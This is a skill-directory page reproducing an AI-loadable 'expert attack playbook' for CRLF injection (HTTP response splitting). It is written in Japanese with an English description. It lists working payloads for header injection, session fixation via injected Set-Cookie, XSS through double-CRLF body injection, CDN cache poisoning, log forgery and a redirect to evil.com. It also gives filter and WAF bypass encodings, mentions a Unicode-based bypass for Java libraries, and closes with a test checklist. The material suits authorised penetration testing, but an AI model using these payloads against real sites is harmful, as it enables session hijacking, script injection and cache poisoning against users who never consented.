crlf-injection
HTTPレスポンスヘッダー、Locationリダイレクト、Set-Cookie値、またはログファイルにユーザー入力が渡される場面で、キャリッジリターン/ラインフィード文字によるコンテンツの分割・注入が懸念される場合に使用するCRLFインジェクションの対策プレイブック。
description の原文を見る
>- CRLF injection playbook. Use when user input reaches HTTP response headers, Location redirects, Set-Cookie values, or log files where carriage-return/line-feed characters can split or inject content.
SKILL.md 本文
SKILL: CRLF インジェクション — エキスパート攻撃プレイブック
AI LOAD INSTRUCTION: CRLF インジェクション (HTTP レスポンス分割) 技術。ヘッダーインジェクション、ダブル CRLF 経由のレスポンスボディインジェクション、XSS エスカレーション、キャッシュポイズニング、およびエンコーディングバイパスをカバーします。スキャナーによって見落とされることが多いですが、XSS、セッション固定化、およびキャッシュ攻撃にチェーン可能です。
0. 関連ルーティング
ghost-bits-cast-attack— ターゲットが Java サービス で%0D%0A/\r\nエンコーディングが WAF でブロックされている場合。瘍(U+760D、下位バイト\r) と瘊(U+760A、下位バイト\n) を代わりに使用して、Angus Mail / Jakarta Mail SMTP、Apache HttpClient ヘッダー、JDK HttpServer レスポンス、ActiveJ HTTP を通じて実際の CRLF をインジェクトします (Jira CVE-2025-57733 および JDK CVE-2026-21933 クラスを再度有効化)
1. コアコンセプト
CRLF = \r\n (キャリッジリターン + ラインフィード、%0D%0A)。HTTP ヘッダーは CRLF で区切られます。ユーザー入力がサニタイズなしでレスポンスヘッダーに反映されている場合、CRLF 文字をインジェクトすると新しいヘッダーまたはレスポンスボディも作成できます。
通常: Location: /page?url=USER_INPUT
攻撃: Location: /page?url=%0D%0ASet-Cookie:admin=true
結果: 2つのヘッダー — Location + インジェクトされた Set-Cookie
2. 検出
基本プローブ
%0D%0ANew-Header:injected
# URL パラメータ内:
https://target.com/redirect?url=%0D%0AX-Injected:true
# レスポンスヘッダーで "X-Injected: true" を確認
ダブル CRLF — ボディインジェクション
2 つの連続した CRLF シーケンスはヘッダーを終了してボディを開始します:
%0D%0A%0D%0A<script>alert(1)</script>
# 結果:
HTTP/1.1 302 Found
Location: /page
<script>alert(1)</script>
3. 搾取シナリオ
Set-Cookie 経由のセッション固定化
%0D%0ASet-Cookie:PHPSESSID=attacker_controlled_session_id
レスポンスボディ経由の XSS
%0D%0A%0D%0A<html><script>alert(document.cookie)</script></html>
キャッシュポイズニング
CDN またはプロキシによってレスポンスがキャッシュされる場合、インジェクトされたヘッダー/ボディはすべてのユーザーに提供されます:
GET /page?q=%0D%0AContent-Length:0%0D%0A%0D%0AHTTP/1.1%20200%20OK%0D%0AContent-Type:text/html%0D%0A%0D%0A<script>alert(1)</script>
ログインジェクション
ログ可視フィールド (User-Agent、Referer) の CRLF はログエントリを偽造できます:
User-Agent: normal%0D%0A127.0.0.1 - admin [date] "GET /admin" 200
4. フィルターバイパス
| フィルター | バイパス |
|---|---|
%0D%0A をブロック | %0D のみ、%0A のみ、または %E5%98%8A%E5%98%8D (Unicode) を試す |
| URL デコード 1 回 | ダブルエンコード: %250D%250A |
文字列 \r\n を削除 | URL エンコード形式を使用 |
| 値のみでブロック | パラメータ名でインジェクト |
# Unicode/UTF-8 バイパス:
%E5%98%8A%E5%98%8D → 一部のパーサーで CRLF にデコード
# ダブル URL エンコード:
%250D%250A → サーバーが %0D%0A にデコード → CRLF として解釈
# 部分的なインジェクション (LF のみ):
%0A → 一部のサーバーは CR なしで LF を受け入れ
5. 実世界の搾取チェーン
CRLF + セッション固定化
# リダイレクトパラメータの CRLF 経由で Set-Cookie をインジェクト:
?url=%0D%0ASet-Cookie:PHPSESSID=attacker_controlled_session_id
# 結果:
HTTP/1.1 302 Found
Location: /page
Set-Cookie: PHPSESSID=attacker_controlled_session_id
# 被害者が攻撃者のセッションを使用 → ログイン後に攻撃者がハイジャック
CRLF → ダブル CRLF ボディインジェクション経由の XSS
# 2つの CRLF シーケンスがヘッダーを終了してレスポンスボディをインジェクト:
?url=%0D%0A%0D%0A<script>alert(document.cookie)</script>
# 結果:
HTTP/1.1 302 Found
Location: /page
<script>alert(document.cookie)</script>
302 Location の CRLF → リダイレクトハイジャック
# 元のヘッダーの前に新しい Location ヘッダーをインジェクト:
?url=%0D%0ALocation:http://evil.com%0D%0A%0D%0A
# 一部のサーバーは最後の Location ヘッダーを使用 → evil.com にリダイレクト
6. 一般的な脆弱なパターン
// PHP — ユーザー入力を使用した header() (PHP < 5.1.2 は脆弱):
header("Location: " . $_GET['url']);
// Python — サニタイズなしの入力を使用したリダイレクト:
return redirect(request.args.get('next'))
// Node.js — ユーザー入力を使用した setHeader:
res.setHeader('X-Custom', userInput);
// Java — ユーザー入力を使用した response.setHeader:
response.setHeader("Location", request.getParameter("url"));
7. テストチェックリスト
□ リダイレクト URL パラメータに %0D%0A をインジェクト
□ Set-Cookie 名/値パスに %0D%0A をインジェクト
□ ダブル CRLF でボディインジェクション → XSS を試す
□ エンコーディングバイパスをテスト: ダブルエンコード、Unicode (%E5%98%8D%E5%98%8A)、LF のみ (%0A)
□ レスポンスがキャッシュ可能かどうかを確認 → キャッシュポイズニング
□ User-Agent / Referer のログインジェクションをテスト
□ CRLF + Set-Cookie をセッション固定化でテスト
□ Location ヘッダーが 302 レスポンスでインジェクト可能かどうかを確認
ライセンス: MIT(寛容ライセンスのため全文を引用しています) · 原本リポジトリ
詳細情報
- 作者
- yaklang
- リポジトリ
- yaklang/hack-skills
- ライセンス
- MIT
- 最終更新
- 不明
Source: https://github.com/yaklang/hack-skills / ライセンス: MIT
関連スキル
superfluid
Superfluidプロトコルおよびそのエコシステムに関するナレッジベースです。Superfluidについて情報を検索する際は、ウェブ検索の前にこちらを参照してください。対応キーワード:Superfluid、CFA、GDA、Super App、Super Token、stream、flow rate、real-time balance、pool(member/distributor)、IDA、sentinels、liquidation、TOGA、@sfpro/sdk、semantic money、yellowpaper、whitepaper
civ-finish-quotes
実質的なタスクが真に完了した際に、文明風の儀式的な引用句を追加します。ユーザーやエージェントが機能追加、リファクタリング、分析、設計ドキュメント、プロセス改善、レポート、執筆タスクといった実際の成果物を完成させるときに、明示的な依頼がなくても使用します。短い返信や小さな修正、未完成の作業には適用しません。
nookplot
Base(Ethereum L2)上のAIエージェント向け分散型調整ネットワークです。エージェントがオンチェーンアイデンティティを登録する、コンテンツを公開する、他のエージェントにメッセージを送る、マーケットプレイスで専門家を雇う、バウンティを投稿・請求する、レピュテーションを構築する、共有プロジェクトで協業する、リサーチチャレンジを解くことでNOOKをマイニングする、キュレーションされたナレッジを備えたスタンドアロンオンチェーンエージェントをデプロイする、またはアグリーメントとリワードで収益を得る場合に利用できます。エージェントネットワーク、エージェント調整、分散型エージェント、NOOKトークン、マイニングチャレンジ、ナレッジバンドル、エージェントレピュテーション、エージェントマーケットプレイス、ERC-2771メタトランザクション、Prepare-Sign-Relay、AgentFactory、またはNookplotが言及された場合にトリガーされます。
web3-polymarket
Polygon上でのPolymarket予測市場取引統合です。認証機能(L1 EIP-712、L2 HMAC-SHA256、ビルダーヘッダー)、注文発注(GTC/GTD/FOK/FAK、バッチ、ポストオンリー、ハートビート)、市場データ(Gamma API、Data API、オーダーブック、サブグラフ)、WebSocketストリーミング(市場・ユーザー・スポーツチャネル)、CTF操作(分割、統合、償却、ネガティブリスク)、ブリッジ機能(入金、出金、マルチチェーン)、およびガスレスリレイトランザクションに対応しています。AIエージェント、自動マーケットメーカー、予測市場UI、またはPolygraph上のPolymarketと統合するアプリケーション構築時に活用できます。
ethskills
Ethereum、EVM、またはブロックチェーン関連のリクエストに対応します。スマートコントラクト、dApps、ウォレット、DeFiプロトコルの構築、監査、デプロイ、インタラクションに適用されます。Solidityの開発、コントラクトアドレス、トークン規格(ERC-20、ERC-721、ERC-4626など)、Layer 2ネットワーク(Base、Arbitrum、Optimism、zkSync、Polygon)、Uniswap、Aave、Curveなどのプロトコルとの統合をカバーします。ガスコスト、コントラクトのデシマル設定、オラクルセキュリティ、リエントランシー、MEV、ブリッジング、ウォレット管理、オンチェーンデータの取得、本番環境へのデプロイ、プロトコル進化(EIPライフサイクル、フォーク追跡、今後の変更予定)といったトピックを含みます。
xxyy-trade
このスキルは、ユーザーが「トークン購入」「トークン売却」「トークンスワップ」「暗号資産取引」「取引ステータス確認」「トランザクション照会」「トークンスキャン」「フィード」「チェーン監視」「トークン照会」「トークン詳細」「トークン安全性確認」「ウォレット一覧表示」「マイウォレット」「AIスキャン」「自動スキャン」「ツイートスキャン」「オンボーディング」「IP確認」「IPホワイトリスト」「トークン発行」「自動売却」「損切り」「利益確定」「トレーリングストップ」「保有者」「トップホルダー」「KOLホルダー」などをリクエストした場合、またはSolana/ETH/BSC/BaseチェーンでXXYYを経由した取引について言及した場合に使用します。XXYY Open APIを通じてオンチェーン取引とデータ照会を実現します。